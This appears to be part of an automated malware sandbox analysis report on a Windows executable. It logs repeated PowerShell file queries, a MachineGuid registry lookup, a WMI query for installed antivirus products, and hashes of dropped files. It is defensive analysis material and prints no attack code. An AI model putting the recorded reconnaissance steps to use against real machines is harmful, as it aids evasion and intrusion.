Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior

Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe

Code function: 14_2_00431442 GetUserNameA,

14_2_00431442

Source: C:\Users\user\Desktop\YYjRtxS70h.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

ID:	1579768
Product:	CloudBasic
Start time:	08:50:42
Start date:	23.12.2024
Sample:	YYjRtxS70h.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	5a59ce92b07de68c0be8fbd7944214e2
SHA1:	b0536d674552c3a11a881b154b668af1b5222641
SHA256:	e09ff2bd97040748812f0434e277b6623ac9aff565fc11003f9abfeeabe9110a
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\YYjRtxS70h.exe.log	CSV text	B2EFBF032531DD2913F648E75696B0FD	3F1AC93E4C10AE6D48E6CE1745D23696FD6554F6	4E02B680F9DAB8F04F2443984B5305541F73B52A612129FCD8CC0C520C831E4B
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\76561199804377619[1].htm	HTML document, Unicode text, UTF-8 text, with very long lines (3254)	59CCD711F973D1DFEE4EA4A63982DDA0	016FF421194218E9827A0A71A870B3A12A98351B	09C585F6464356DD296DE9585EF3CCCF0F2475ADE542656E5041AE9BE0D064FA
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\76561199804377619[1].htm	HTML document, Unicode text, UTF-8 text, with very long lines (3254)	EC02A148AB42B542663D918C619429C6	49B3118223BD91B3ABAFADA8A4B523E5E0559FCE	78D3702AC5E051FBE48DB1509EA83B96CFE4219BC0630F6788C243AAB4436F66
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	446DD1CF97EABA21CF14D03AEBC79F27	36E4CC7367E0C7B40F4A8ACE272941EA46373799	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0c4sbize.gt5.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0fimw0nw.epw.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_44azgeaa.mu5.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5dvcmsww.5jr.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fqrrzbsa.01l.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gg2wq42q.z3x.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gqil3wa2.s4a.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gx55hdj2.oc1.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
